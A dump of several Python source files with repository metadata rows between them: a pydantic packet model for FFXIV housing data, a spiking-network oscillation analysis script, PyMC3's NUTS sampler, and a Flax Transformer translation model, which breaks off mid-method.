    client_timestamp: float
    server_timestamp: float
    @classmethod
    def __get_validators__(cls):
        # Override pydantic's default validator chain: the only validator is
        # the dispatching constructor below.
        yield cls.return_effect
    @classmethod
    def return_effect(cls, values): # https://github.com/samuelcolvin/pydantic/issues/619#issuecomment-713508861
        """Construct the concrete packet class selected by values['event_type']."""
        try:
            etype = values["event_type"]
        except KeyError:
            raise ValueError("missing 'event_type' key")
        try:
            # NOTE(review): this except also masks a KeyError raised *inside*
            # the subclass constructor, reporting it as an unknown event type.
            return EVENT_TYPES[etype](**values)
        except KeyError:
            raise ValueError(f"{etype} is not a valid event type")
class HousingWardInfo(BaseFFXIVPacket):
    """Snapshot of one ward: its identity plus info for all 60 plots."""
    event_type = models.EventType.HOUSING_WARD_INFO
    LandIdent: LandIdent
    HouseInfoEntries: conlist(HouseInfoEntry, min_items=60, max_items=60)  # exactly 60 plots per ward
# Dispatch table used by BaseFFXIVPacket.return_effect to select the concrete
# packet class for an incoming payload's event_type value.
EVENT_TYPES = {
    models.EventType.HOUSING_WARD_INFO.value: HousingWardInfo
}
| 24.044776 | 113 | 0.693358 |
795c85faf50d1ad76996aebbcd983f71a5e378ac | 3,292 | py | Python | analysis_codes_v1/oscillations_run.py | zqwei/LIF_Vis_model | 16f651ac827ba5f0feb40a0e619e600f1251d009 | [
"MIT"
] | null | null | null | analysis_codes_v1/oscillations_run.py | zqwei/LIF_Vis_model | 16f651ac827ba5f0feb40a0e619e600f1251d009 | [
"MIT"
] | null | null | null | analysis_codes_v1/oscillations_run.py | zqwei/LIF_Vis_model | 16f651ac827ba5f0feb40a0e619e600f1251d009 | [
"MIT"
] | null | null | null | import matplotlib
# Headless backend: the script runs without a display and saves a PNG at the end.
matplotlib.use('Agg')
import oscillations
import pickle
import numpy as np
import matplotlib.pyplot as plt
matplotlib.rcParams.update({'font.size': 20})
# Analysis window and bin width passed to oscillations.av_r_weighted_mu_activity;
# units are presumably ms -- confirm against that function.
bin_start = 500.0
bin_stop = 3000.0
bin_size = 1.0
electrode_pos = [0.0, 0.0, 0.0]  # virtual electrode position (x, y, z)
r_cutoff = 10.0 # Distance, in um, below which the weights for 1/r contributions are set to 0.
N_trials = 10  # simulation trials per grating stimulus
# Path to the network model build directory holding the per-system cell databases.
cell_db_path = '/allen/aibs/mat/antona/network/14-simulations/9-network/build/'
# Decide which systems we are doing analysis for.
sys_dict = {}
# One entry per simulated system.  Spike file paths are assembled as
# f_1 + 'g<grating_id>_<trial>' + f_2; 'grating_ids' holds three lists of
# grating ids whose trials are pooled into one spectrum each; 'marker' is
# the matplotlib line style used when plotting.
sys_dict['ll1'] = {'cells_file': cell_db_path+'ll1.csv',
                   'f_1': '../simulation_ll1/output_ll1_',
                   'f_2': '_sdlif_z101/spk.dat',
                   'f_out_prefix': 'oscillations/ll1_spectrum',
                   'grating_ids': [range(7, 240, 30), range(8, 240, 30), range(9, 240, 30)],
                   'marker': '--'}
sys_dict['ll2'] = {'cells_file': cell_db_path+'ll2.csv',
                   'f_1': '../simulation_ll2/output_ll2_',
                   'f_2': '_sdlif_z101/spk.dat',
                   'f_out_prefix': 'oscillations/ll2_spectrum',
                   'grating_ids': [range(7, 240, 30), range(8, 240, 30), range(9, 240, 30)],
                   'marker': '-'}
sys_dict['ll3'] = {'cells_file': cell_db_path+'ll3.csv',
                   'f_1': '../simulation_ll3/output_ll3_',
                   'f_2': '_sdlif_z101/spk.dat',
                   'f_out_prefix': 'oscillations/ll3_spectrum',
                   'grating_ids': [range(7, 240, 30), range(8, 240, 30), range(9, 240, 30)],
                   'marker': ':'}
# Process the data and obtain spectra.
for sys_name in sys_dict.keys():
    for gratings_list in sys_dict[sys_name]['grating_ids']:
        # Pool every trial of every grating in this list into one spectrum.
        f_spk_list = []
        cells_file_list = []
        for grating_id in gratings_list:
            for trial in xrange(N_trials):  # xrange: this script targets Python 2.
                f_spk_list.append('%sg%d_%d%s' % (sys_dict[sys_name]['f_1'], grating_id, trial, sys_dict[sys_name]['f_2']))
                cells_file_list.append(sys_dict[sys_name]['cells_file'])
        tmp = oscillations.av_r_weighted_mu_activity(f_spk_list, cells_file_list, electrode_pos, r_cutoff, bin_start, bin_stop, bin_size)
        # Output file is keyed by the first grating id of the pooled list.
        # NOTE(review): text-mode 'w' is fine for Python 2 pickle; Python 3 needs 'wb'.
        f = open('%s_%d.pkl' % (sys_dict[sys_name]['f_out_prefix'], gratings_list[0]), 'w')
        pickle.dump(tmp, f)
        f.close()
# Plot the results.
for sys_name in sys_dict.keys():
    # Only the spectrum pooled over gratings starting at id 8 is plotted here.
    grating_start = 8
    f_name = '%s_%d.pkl' % (sys_dict[sys_name]['f_out_prefix'], grating_start)
    f = open(f_name, 'r')
    freq_fft_abs, av_fft_abs, std_fft_abs = pickle.load(f)
    f.close()
    # Restrict the plotted band to 0 < f < 100 Hz.
    ind = np.intersect1d(np.where(freq_fft_abs > 0.0), np.where(freq_fft_abs < 100.0))
    #plt.errorbar(freq_fft_abs[ind], av_fft_abs[ind], yerr=std_fft_abs[ind], marker=sys_dict[sys_name]['marker'], ms=10, markevery=5, color='k', linewidth=2, capsize=0, ecolor='lightgray', elinewidth=5, label=f_name)
    # Power scaled by 1000 for readable axis values (arbitrary units anyway).
    plt.errorbar(freq_fft_abs[ind], 1000.0*av_fft_abs[ind], yerr=1000.0*std_fft_abs[ind], ls=sys_dict[sys_name]['marker'], color='k', linewidth=2, capsize=0, ecolor='lightgray', elinewidth=5, label=f_name)
plt.legend()
plt.ylabel('Power (arb. u.)')
plt.xlabel('Frequency (Hz)')
plt.show()  # no-op under the 'Agg' backend; savefig below does the real output
plt.savefig('oscillations/oscillations_TF4Hz.png')
| 46.366197 | 216 | 0.626367 |
795c870bf304e00bfcecd9e8b781a3472967b4f2 | 6,475 | py | Python | pymc3/step_methods/nuts.py | MichielCottaar/pymc3 | f37198653e7d09881e7bc411cbd10fffbab442c2 | [
"Apache-2.0"
] | null | null | null | pymc3/step_methods/nuts.py | MichielCottaar/pymc3 | f37198653e7d09881e7bc411cbd10fffbab442c2 | [
"Apache-2.0"
] | null | null | null | pymc3/step_methods/nuts.py | MichielCottaar/pymc3 | f37198653e7d09881e7bc411cbd10fffbab442c2 | [
"Apache-2.0"
] | null | null | null | from .quadpotential import *
from .arraystep import *
from ..core import *
from numpy import exp, log
from numpy.random import uniform
from .hmc import leapfrog, Hamiltonian, bern, energy
from ..distributions import *
from ..tuning import guess_scaling
import theano
from ..theanof import make_shared_replacements, join_nonshared_inputs, CallableTensor
import theano.tensor
__all__ = ['NUTS']
class NUTS(ArrayStepShared):
    """
    Automatically tunes step size and adjust number of steps for good performance.
    Implements "Algorithm 6: Efficient No-U-Turn Sampler with Dual Averaging" in:
    Hoffman, Matthew D., & Gelman, Andrew. (2011).
    The No-U-Turn Sampler: Adaptively Setting Path Lengths in Hamiltonian Monte Carlo.
    """
    default_blocked = True
    def __init__(self, vars=None, scaling=None, step_scale=0.25, is_cov=False, state=None,
                 Emax=1000,
                 target_accept=0.8,
                 gamma=0.05,
                 k=0.75,
                 t0=10,
                 model=None,
                 profile=False,**kwargs):
        """
        Parameters
        ----------
        vars : list of Theano variables, default continuous vars
        scaling : array_like, ndim = {1,2} or point
            Scaling for momentum distribution. 1d arrays interpreted matrix diagonal.
        step_scale : float, default=.25
            Size of steps to take, automatically scaled down by 1/n**(1/4)
        is_cov : bool, default=False
            Treat C as a covariance matrix/vector if True, else treat it as a precision matrix/vector
        state
            state to start from
        Emax : float, default 1000
            maximum energy
        target_accept : float (0,1) default .8
            target for avg accept probability between final branch and initial position
        gamma : float, default .05
        k : float (.5,1) default .75
            scaling of speed of adaptation
        t0 : int, default 10
            slows initial adaptation
        model : Model
        profile : bool or ProfileStats
            sets the functions to be profiled
        """
        model = modelcontext(model)
        if vars is None:
            vars = model.cont_vars
        vars = inputvars(vars)
        if scaling is None:
            scaling = model.test_point
        if isinstance(scaling, dict):
            scaling = guess_scaling(Point(scaling, model=model), model=model, vars = vars)
        n = scaling.shape[0]
        # Hoffman & Gelman heuristic: shrink the base step with dimensionality.
        self.step_size = step_scale / n**(1/4.)
        self.potential = quad_potential(scaling, is_cov, as_cov=False)
        if state is None:
            state = SamplerHist()
        self.state = state
        self.Emax = Emax
        self.target_accept = target_accept
        self.gamma = gamma
        self.t0 = t0
        self.k = k
        # Dual-averaging state: Hbar tracks the running acceptance error,
        # u is mu = log(10 * initial step size), m counts adaptation steps.
        self.Hbar = 0
        self.u = log(self.step_size*10)
        self.m = 1
        shared = make_shared_replacements(vars, model)
        # Compiled theano function: one leapfrog step plus the energy change.
        self.leapfrog1_dE = leapfrog1_dE(model.logpt, vars, shared, self.potential, profile=profile)
        super(NUTS, self).__init__(vars, shared, **kwargs)
    def astep(self, q0):
        """Take one NUTS step from position q0 and return the new position."""
        H = self.leapfrog1_dE #Hamiltonian(self.logp, self.dlogp, self.potential)
        Emax = self.Emax
        e = self.step_size
        p0 = self.potential.random()
        # Slice variable for the slice-sampling formulation (Algorithm 6).
        u = uniform()
        # (qn, pn) / (qp, pp) are the backward / forward trajectory endpoints.
        q = qn = qp = q0
        p = pn = pp = p0
        n, s, j = 1, 1, 0
        # Doubling loop: grow the trajectory until a U-turn or divergence (s == 0).
        while s == 1:
            # Random direction: -1 extends backwards, +1 extends forwards.
            v = bern(.5) * 2 - 1
            if v == -1:
                qn, pn, _, _, q1, n1, s1, a, na = buildtree(H, qn, pn, u, v, j, e, Emax, q0, p0)
            else:
                _, _, qp, pp, q1, n1, s1, a, na = buildtree(H, qp, pp, u, v, j, e, Emax, q0, p0)
            # Progressive sampling: accept the new subtree's proposal w.p. n1/n.
            if s1 == 1 and bern(min(1, n1*1./n)):
                q = q1
            n = n + n1
            span = qp - qn
            # U-turn criterion: stop once the trajectory starts doubling back.
            s = s1 * (span.dot(pn) >= 0) * (span.dot(pp) >= 0)
            j = j + 1
        # Momentum negation for reversibility (p is not used further here).
        p = -p
        # Dual-averaging step-size adaptation towards target_accept.
        w = 1./(self.m+self.t0)
        self.Hbar = (1 - w) * self.Hbar + w*(self.target_accept - a*1./na)
        self.step_size = exp(self.u - (self.m**.5/self.gamma)*self.Hbar)
        self.m += 1
        return q
    @staticmethod
    def competence(var):
        # NUTS only applies to continuous variables.
        if var.dtype in continuous_types:
            return Competence.ideal
        return Competence.incompatible
def buildtree(H, q, p, u, v, j, e, Emax, q0, p0):
    """Recursively build a depth-j trajectory subtree (NUTS Algorithm 6 helper).

    Returns (q-, p-, q+, p+, q', n', s', alpha, n_alpha): the backward/forward
    endpoints, a proposal sampled from the subtree, the count of valid points,
    the continue flag, and dual-averaging acceptance statistics.
    """
    if j == 0:
        # Base case: a single leapfrog step of signed size v*e.
        leapfrog1_dE = H
        q1, p1, dE = leapfrog1_dE(q, p, np.array(v*e))
        n1 = int(log(u) + dE <= 0)  # is the new point inside the slice?
        s1 = int(log(u) + dE < Emax)  # divergence check against the energy cap
        return q1, p1, q1, p1, q1, n1, s1, min(1, exp(-dE)), 1
    else:
        # Recursion: build the first half-tree, then (if still valid) extend it.
        qn, pn, qp, pp, q1, n1, s1, a1, na1 = buildtree(H, q, p, u, v, j - 1, e, Emax, q0, p0)
        if s1 == 1:
            if v == -1:
                qn, pn, _, _, q11, n11, s11, a11, na11 = buildtree(H, qn, pn, u, v, j - 1, e, Emax, q0, p0)
            else:
                _, _, qp, pp, q11, n11, s11, a11, na11 = buildtree(H, qp, pp, u, v, j - 1, e, Emax, q0, p0)
            # Progressive sampling: maybe take the proposal from the new half.
            if bern(n11*1./(max(n1 + n11, 1))):
                q1 = q11
            a1 = a1 + a11
            na1 = na1 + na11
            span = qp - qn
            # U-turn check across the merged subtree.
            s1 = s11 * (span.dot(pn) >= 0) * (span.dot(pp) >= 0)
            n1 = n1 + n11
        return qn, pn, qp, pp, q1, n1, s1, a1, na1
    return  # NOTE(review): unreachable -- both branches above already return.
def leapfrog1_dE(logp, vars, shared, pot, profile):
    """Computes a theano function that computes one leapfrog step and the energy difference between the beginning and end of the trajectory.
    Parameters
    ----------
    logp : TensorVariable
    vars : list of tensor variables
    shared : list of shared variables not to compute leapfrog over
    pot : quadpotential
    profile : Boolean
    Returns
    -------
    theano function which returns
    q_new, p_new, delta_E
    """
    dlogp = gradient(logp, vars)
    # Fold the non-shared inputs into a single flat vector input q0.
    (logp, dlogp), q0 = join_nonshared_inputs([logp, dlogp], vars, shared)
    # Wrap as callables so Hamiltonian can evaluate them at symbolic points.
    logp = CallableTensor(logp)
    dlogp = CallableTensor(dlogp)
    H = Hamiltonian(logp, dlogp, pot)
    p0 = theano.tensor.dvector('p0')
    # test_value tags keep theano's compute_test_value debugging mode happy.
    p0.tag.test_value = q0.tag.test_value
    e = theano.tensor.dscalar('e')
    e.tag.test_value = 1
    # One leapfrog step of (symbolic) size e.
    q1, p1 = leapfrog(H, q0, p0, 1, e)
    E = energy(H, q1, p1)
    E0 = energy(H, q0, p0)
    dE = E - E0
    f = theano.function([q0, p0, e], [q1, p1, dE], profile=profile)
    # Skip theano's input validation on every call -- callers must pass
    # correctly-typed float64 arrays.
    f.trust_input = True
    return f
| 30.687204 | 140 | 0.545483 |
795c870fb161d0514bee3682d79d1a5dea9371fb | 17,381 | py | Python | algorithmic_efficiency/workloads/wmt/wmt_jax/models.py | Bezenek/algorithmic-efficiency | 84aac20796d685f810960dfa4fe5524798db876e | [
"Apache-2.0"
] | 1 | 2022-01-29T07:51:55.000Z | 2022-01-29T07:51:55.000Z | algorithmic_efficiency/workloads/wmt/wmt_jax/models.py | Bezenek/algorithmic-efficiency | 84aac20796d685f810960dfa4fe5524798db876e | [
"Apache-2.0"
] | null | null | null | algorithmic_efficiency/workloads/wmt/wmt_jax/models.py | Bezenek/algorithmic-efficiency | 84aac20796d685f810960dfa4fe5524798db876e | [
"Apache-2.0"
] | 1 | 2022-01-20T17:43:29.000Z | 2022-01-20T17:43:29.000Z | """Transformer-based machine translation model."""
from typing import Any, Callable, Optional
from flax import linen as nn
from flax import struct
from jax import lax
import jax.numpy as jnp
import numpy as np
@struct.dataclass
class TransformerConfig:
  """Global hyperparameters used to minimize obnoxious kwarg plumbing."""
  vocab_size: int = 32000
  output_vocab_size: int = 32000
  share_embeddings: bool = True  # one table for source/target (see Transformer.setup)
  logits_via_embedding: bool = True  # tie output projection to the embedding (see Decoder)
  dtype: Any = jnp.float32
  emb_dim: int = 1024
  num_heads: int = 16
  num_layers: int = 6
  qkv_dim: int = 1024
  mlp_dim: int = 4096
  max_len: int = 256  # maximum sequence length for the positional-embedding table
  dropout_rate: float = 0.1
  attention_dropout_rate: float = 0.1
  deterministic: bool = False  # True disables all dropout (evaluation mode)
  decode: bool = False  # True enables the autoregressive decoding cache path
  kernel_init: Callable = nn.initializers.xavier_uniform()
  bias_init: Callable = nn.initializers.normal(stddev=1e-6)
  posemb_init: Optional[Callable] = None  # None selects fixed sinusoidal embeddings
def shift_right(x, axis=1):
  """Shift `x` one step to the right along `axis`, zero-filling the front.

  Args:
    x: input array.
    axis: axis along which to shift (defaults to the time axis, 1).

  Returns:
    An array of the same shape as `x`, shifted right along `axis`, with a
    zero of `x.dtype` inserted at the front of that axis.
  """
  pad_widths = [(0, 0)] * len(x.shape)
  pad_widths[axis] = (1, 0)
  padded = jnp.pad(
      x, pad_widths, mode='constant', constant_values=x.dtype.type(0))
  # Drop the last position along the *same* axis that was padded.  The
  # original hard-coded `padded[:, :-1]`, silently breaking any axis != 1.
  index = [slice(None)] * x.ndim
  index[axis] = slice(0, -1)
  return padded[tuple(index)]
def sinusoidal_init(max_len=2048, min_scale=1.0, max_scale=10000.0):
  """1D Sinusoidal Position Embedding Initializer.

  Args:
    max_len: maximum possible length for the input.
    min_scale: float: minimum frequency-scale in sine grating.
    max_scale: float: maximum frequency-scale in sine grating.

  Returns:
    output: init function returning `(1, max_len, d_feature)`
  """

  def init(key, shape, dtype=np.float32):
    """Sinusoidal init; only shape[-1] (the feature depth) is used."""
    del key, dtype
    depth = shape[-1]
    half = depth // 2
    table = np.zeros((max_len, depth), dtype=np.float32)
    positions = np.arange(0, max_len)[:, np.newaxis]
    # Geometric frequency ladder from min_scale to max_scale over `half` bins.
    decay = -np.log(max_scale / min_scale) / (half - 1)
    freqs = min_scale * np.exp(np.arange(0, half) * decay)
    angles = positions * freqs
    # First half of the features holds sines, second half cosines.
    table[:, :half] = np.sin(angles)
    table[:, half:2 * half] = np.cos(angles)
    # Prepend a batch axis: (1, max_len, depth).
    return jnp.array(table[np.newaxis, :, :])

  return init
class AddPositionEmbs(nn.Module):
  """Adds (optionally learned) positional embeddings to the inputs.
  Attributes:
    config: TransformerConfig dataclass containing hyperparameters.
    decode: whether to run in single-position autoregressive mode.
  """
  config: TransformerConfig
  decode: bool = False
  @nn.compact
  def __call__(self, inputs, inputs_positions=None):
    """Applies AddPositionEmbs module.
    By default this layer uses a fixed sinusoidal embedding table. If a
    learned position embedding is desired, pass an initializer to
    posemb_init in the configuration.
    Args:
      inputs: input data.
      inputs_positions: input position indices for packed sequences.
    Returns:
      output: `(bs, timesteps, in_dim)`
    """
    cfg = self.config
    # inputs.shape is (batch_size, seq_len, emb_dim)
    assert inputs.ndim == 3, ('Number of dimensions should be 3,'
                              ' but it is: %d' % inputs.ndim)
    length = inputs.shape[1]
    pos_emb_shape = (1, cfg.max_len, inputs.shape[-1])
    if cfg.posemb_init is None:
      # Use a fixed (non-learned) sinusoidal position embedding.
      pos_embedding = sinusoidal_init(max_len=cfg.max_len)(None, pos_emb_shape,
                                                           None)
    else:
      pos_embedding = self.param('pos_embedding', cfg.posemb_init,
                                 pos_emb_shape)
    pe = pos_embedding[:, :length, :]
    # We use a cache position index for tracking decoding position.
    if self.decode:
      is_initialized = self.has_variable('cache', 'cache_index')
      cache_index = self.variable('cache', 'cache_index',
                                  lambda: jnp.array(0, dtype=jnp.uint32))
      if is_initialized:
        # Single-token decode step: slice out only this position's embedding
        # and advance the cached position counter.  (During module init the
        # variable is created but not consumed.)
        i = cache_index.value
        cache_index.value = i + 1
        _, _, df = pos_embedding.shape
        pe = lax.dynamic_slice(pos_embedding, jnp.array((0, i, 0)), (1, 1, df))
    if inputs_positions is None:
      # normal unpacked case:
      return inputs + pe
    else:
      # for packed data we need to use known position indices:
      return inputs + jnp.take(pe[0], inputs_positions, axis=0)
class MlpBlock(nn.Module):
  """Transformer MLP / feed-forward block.
  Attributes:
    config: TransformerConfig dataclass containing hyperparameters.
    out_dim: optionally specify out dimension.
  """
  config: TransformerConfig
  out_dim: Optional[int] = None
  @nn.compact
  def __call__(self, inputs):
    """Applies Transformer MlpBlock module: Dense -> relu -> dropout -> Dense -> dropout."""
    cfg = self.config
    # Default the output width to the input feature dimension.
    actual_out_dim = (
        inputs.shape[-1] if self.out_dim is None else self.out_dim)
    x = nn.Dense(
        cfg.mlp_dim,
        dtype=cfg.dtype,
        kernel_init=cfg.kernel_init,
        bias_init=cfg.bias_init)(
            inputs)
    x = nn.relu(x)
    x = nn.Dropout(rate=cfg.dropout_rate)(x, deterministic=cfg.deterministic)
    output = nn.Dense(
        actual_out_dim,
        dtype=cfg.dtype,
        kernel_init=cfg.kernel_init,
        bias_init=cfg.bias_init)(
            x)
    output = nn.Dropout(rate=cfg.dropout_rate)(
        output, deterministic=cfg.deterministic)
    return output
class Encoder1DBlock(nn.Module):
  """Transformer encoder layer.
  Attributes:
    config: TransformerConfig dataclass containing hyperparameters.
  """
  config: TransformerConfig
  @nn.compact
  def __call__(self, inputs, encoder_mask=None):
    """Applies Encoder1DBlock module.
    Args:
      inputs: input data.
      encoder_mask: encoder self-attention mask.
    Returns:
      output after transformer encoder block.
    """
    cfg = self.config
    # Attention block.
    assert inputs.ndim == 3
    # Pre-LayerNorm self-attention sub-block with a residual connection.
    x = nn.LayerNorm(dtype=cfg.dtype)(inputs)
    x = nn.SelfAttention(
        num_heads=cfg.num_heads,
        dtype=cfg.dtype,
        qkv_features=cfg.qkv_dim,
        kernel_init=cfg.kernel_init,
        bias_init=cfg.bias_init,
        use_bias=False,
        broadcast_dropout=False,
        dropout_rate=cfg.attention_dropout_rate,
        deterministic=cfg.deterministic)(x, encoder_mask)
    x = nn.Dropout(rate=cfg.dropout_rate)(x, deterministic=cfg.deterministic)
    x = x + inputs
    # MLP block.
    # Pre-LayerNorm feed-forward sub-block with a residual connection.
    y = nn.LayerNorm(dtype=cfg.dtype)(x)
    y = MlpBlock(config=cfg)(y)
    return x + y
class EncoderDecoder1DBlock(nn.Module):
  """Transformer encoder-decoder layer.
  Attributes:
    config: TransformerConfig dataclass containing hyperparameters.
  """
  config: TransformerConfig
  @nn.compact
  def __call__(self,
               targets,
               encoded,
               decoder_mask=None,
               encoder_decoder_mask=None):
    """Applies EncoderDecoder1DBlock module.
    Args:
      targets: input data for decoder
      encoded: input data from encoder
      decoder_mask: decoder self-attention mask.
      encoder_decoder_mask: encoder-decoder attention mask.
    Returns:
      output after transformer encoder-decoder block.
    """
    cfg = self.config
    # Decoder block.
    assert targets.ndim == 3
    # Pre-LayerNorm causal self-attention over the targets, with residual.
    x = nn.LayerNorm(dtype=cfg.dtype)(targets)
    x = nn.SelfAttention(
        num_heads=cfg.num_heads,
        dtype=cfg.dtype,
        qkv_features=cfg.qkv_dim,
        kernel_init=cfg.kernel_init,
        bias_init=cfg.bias_init,
        use_bias=False,
        broadcast_dropout=False,
        dropout_rate=cfg.attention_dropout_rate,
        deterministic=cfg.deterministic,
        decode=cfg.decode)(x, decoder_mask)
    x = nn.Dropout(rate=cfg.dropout_rate)(x, deterministic=cfg.deterministic)
    x = x + targets
    # Encoder-Decoder block.
    # Cross-attention: queries from the decoder stream, keys/values from
    # the encoder output, with residual.
    y = nn.LayerNorm(dtype=cfg.dtype)(x)
    y = nn.MultiHeadDotProductAttention(
        num_heads=cfg.num_heads,
        dtype=cfg.dtype,
        qkv_features=cfg.qkv_dim,
        kernel_init=cfg.kernel_init,
        bias_init=cfg.bias_init,
        use_bias=False,
        broadcast_dropout=False,
        dropout_rate=cfg.attention_dropout_rate,
        deterministic=cfg.deterministic)(y, encoded, encoder_decoder_mask)
    y = nn.Dropout(rate=cfg.dropout_rate)(y, deterministic=cfg.deterministic)
    y = y + x
    # MLP block.
    z = nn.LayerNorm(dtype=cfg.dtype)(y)
    z = MlpBlock(config=cfg)(z)
    return y + z
class Encoder(nn.Module):
  """Transformer Model Encoder for sequence to sequence translation.
  Attributes:
    config: TransformerConfig dataclass containing hyperparameters.
    shared_embedding: a shared embedding layer to use.
  """
  config: TransformerConfig
  shared_embedding: Any = None
  @nn.compact
  def __call__(self, inputs, inputs_positions=None, encoder_mask=None):
    """Applies Transformer model on the inputs.
    Args:
      inputs: input data
      inputs_positions: input subsequence positions for packed examples.
      encoder_mask: encoder self-attention mask.
    Returns:
      output of a transformer encoder.
    """
    cfg = self.config
    assert inputs.ndim == 2  # (batch, len)
    # Input Embedding
    # Use the caller-supplied (shared) embedding table when given; otherwise
    # create a private one for the source vocabulary.
    if self.shared_embedding is None:
      input_embed = nn.Embed(
          num_embeddings=cfg.vocab_size,
          features=cfg.emb_dim,
          embedding_init=nn.initializers.normal(stddev=1.0))
    else:
      input_embed = self.shared_embedding
    x = inputs.astype('int32')
    x = input_embed(x)
    x = AddPositionEmbs(
        config=cfg, decode=False, name='posembed_input')(
            x, inputs_positions=inputs_positions)
    x = nn.Dropout(rate=cfg.dropout_rate)(x, deterministic=cfg.deterministic)
    x = x.astype(cfg.dtype)
    # Input Encoder
    for lyr in range(cfg.num_layers):
      x = Encoder1DBlock(
          config=cfg, name=f'encoderblock_{lyr}')(x, encoder_mask)
    # Final LayerNorm (pre-LN architecture needs one after the last block).
    encoded = nn.LayerNorm(dtype=cfg.dtype, name='encoder_norm')(x)
    return encoded
class Decoder(nn.Module):
  """Transformer Model Decoder for sequence to sequence translation.
  Attributes:
    config: TransformerConfig dataclass containing hyperparameters.
    shared_embedding: a shared embedding layer to use.
  """
  config: TransformerConfig
  shared_embedding: Any = None
  @nn.compact
  def __call__(self,
               encoded,
               targets,
               targets_positions=None,
               decoder_mask=None,
               encoder_decoder_mask=None):
    """Applies Transformer model on the inputs.
    Args:
      encoded: encoded input data from encoder.
      targets: target inputs.
      targets_positions: input subsequence positions for packed examples.
      decoder_mask: decoder self-attention mask.
      encoder_decoder_mask: encoder-decoder attention mask.
    Returns:
      output of a transformer decoder.
    """
    cfg = self.config
    assert encoded.ndim == 3  # (batch, len, depth)
    assert targets.ndim == 2  # (batch, len)
    # Target Embedding
    if self.shared_embedding is None:
      output_embed = nn.Embed(
          num_embeddings=cfg.output_vocab_size,
          features=cfg.emb_dim,
          embedding_init=nn.initializers.normal(stddev=1.0))
    else:
      output_embed = self.shared_embedding
    y = targets.astype('int32')
    # Teacher forcing: shift targets right so position t only sees < t.
    # In cached decode mode the inputs already arrive one token at a time.
    if not cfg.decode:
      y = shift_right(y)
    y = output_embed(y)
    y = AddPositionEmbs(
        config=cfg, decode=cfg.decode, name='posembed_output')(
            y, inputs_positions=targets_positions)
    y = nn.Dropout(rate=cfg.dropout_rate)(y, deterministic=cfg.deterministic)
    y = y.astype(cfg.dtype)
    # Target-Input Decoder
    for lyr in range(cfg.num_layers):
      y = EncoderDecoder1DBlock(
          config=cfg, name=f'encoderdecoderblock_{lyr}')(
              y,
              encoded,
              decoder_mask=decoder_mask,
              encoder_decoder_mask=encoder_decoder_mask)
    y = nn.LayerNorm(dtype=cfg.dtype, name='encoderdecoder_norm')(y)
    # Decoded Logits
    if cfg.logits_via_embedding:
      # Use the transpose of embedding matrix for logit transform.
      logits = output_embed.attend(y.astype(jnp.float32))
      # Correctly normalize pre-softmax logits for this shared case.
      logits = logits / jnp.sqrt(y.shape[-1])
    else:
      logits = nn.Dense(
          cfg.output_vocab_size,
          dtype=cfg.dtype,
          kernel_init=cfg.kernel_init,
          bias_init=cfg.bias_init,
          name='logitdense')(
              y)
    return logits
class Transformer(nn.Module):
  """Transformer Model for sequence to sequence translation.
  Attributes:
    config: TransformerConfig dataclass containing hyperparameters.
  """
  config: TransformerConfig
  def setup(self):
    cfg = self.config
    # When share_embeddings is set, one embedding table serves both source
    # and target (weight tying), which requires equal vocabulary sizes.
    if cfg.share_embeddings:
      if cfg.output_vocab_size is not None:
        assert cfg.output_vocab_size == cfg.vocab_size, (
            "can't share embedding with different vocab sizes.")
      self.shared_embedding = nn.Embed(
          num_embeddings=cfg.vocab_size,
          features=cfg.emb_dim,
          embedding_init=nn.initializers.normal(stddev=1.0))
    else:
      self.shared_embedding = None
    self.encoder = Encoder(config=cfg, shared_embedding=self.shared_embedding)
    self.decoder = Decoder(config=cfg, shared_embedding=self.shared_embedding)
  def encode(self, inputs, inputs_positions=None, inputs_segmentation=None):
    """Applies Transformer encoder-branch on the inputs.
    Args:
      inputs: input data.
      inputs_positions: input subsequence positions for packed examples.
      inputs_segmentation: input segmentation info for packed examples.
    Returns:
      encoded feature array from the transformer encoder.
    """
    cfg = self.config
    # Make padding attention mask.
    # Tokens with id 0 are treated as padding throughout.
    encoder_mask = nn.make_attention_mask(
        inputs > 0, inputs > 0, dtype=cfg.dtype)
    # Add segmentation block-diagonal attention mask if using segmented data.
    if inputs_segmentation is not None:
      encoder_mask = nn.combine_masks(
          encoder_mask,
          nn.make_attention_mask(
              inputs_segmentation,
              inputs_segmentation,
              jnp.equal,
              dtype=cfg.dtype))
    return self.encoder(
        inputs, inputs_positions=inputs_positions, encoder_mask=encoder_mask)
  def decode(
      self,
      encoded,
      inputs,  # only needed for masks
      targets,
      targets_positions=None,
      inputs_segmentation=None,
      targets_segmentation=None):
    """Applies Transformer decoder-branch on encoded-input and target.
    Args:
      encoded: encoded input data from encoder.
      inputs: input data (only needed for masking).
      targets: target data.
      targets_positions: target subsequence positions for packed examples.
      inputs_segmentation: input segmentation info for packed examples.
      targets_segmentation: target segmentation info for packed examples.
    Returns:
      logits array from transformer decoder.
    """
    cfg = self.config
    # Make padding attention masks.
    if cfg.decode:
      # Fast autoregressive decoding: causality is enforced by the layer
      # cache, so only the encoder-decoder padding mask is needed.
      decoder_mask = None
      encoder_decoder_mask = nn.make_attention_mask(
          jnp.ones_like(targets) > 0, inputs > 0, dtype=cfg.dtype)
    else:
      # Training / scoring: combine target padding mask with a causal mask.
      decoder_mask = nn.combine_masks(
          nn.make_attention_mask(targets > 0, targets > 0, dtype=cfg.dtype),
          nn.make_causal_mask(targets, dtype=cfg.dtype))
      encoder_decoder_mask = nn.make_attention_mask(
          targets > 0, inputs > 0, dtype=cfg.dtype)
    # Add segmentation block-diagonal attention masks if using segmented data.
    if inputs_segmentation is not None:
      decoder_mask = nn.combine_masks(
          decoder_mask,
          nn.make_attention_mask(
              targets_segmentation,
              targets_segmentation,
              jnp.equal,
              dtype=cfg.dtype))
      encoder_decoder_mask = nn.combine_masks(
          encoder_decoder_mask,
          nn.make_attention_mask(
              targets_segmentation,
              inputs_segmentation,
              jnp.equal,
              dtype=cfg.dtype))
    logits = self.decoder(
        encoded,
        targets,
        targets_positions=targets_positions,
        decoder_mask=decoder_mask,
        encoder_decoder_mask=encoder_decoder_mask)
    return logits.astype(self.config.dtype)
  def __call__(self,
               inputs,
               targets,
               inputs_positions=None,
               targets_positions=None,
               inputs_segmentation=None,
               targets_segmentation=None):
    """Applies Transformer model on the inputs.
    Args:
      inputs: input data.
      targets: target data.
      inputs_positions: input subsequence positions for packed examples.
      targets_positions: target subsequence positions for packed examples.
      inputs_segmentation: input segmentation info for packed examples.
      targets_segmentation: target segmentation info for packed examples.
    Returns:
      logits array from full transformer.
    """
    encoded = self.encode(
        inputs,
        inputs_positions=inputs_positions,
        inputs_segmentation=inputs_segmentation)
    return self.decode(
        encoded,
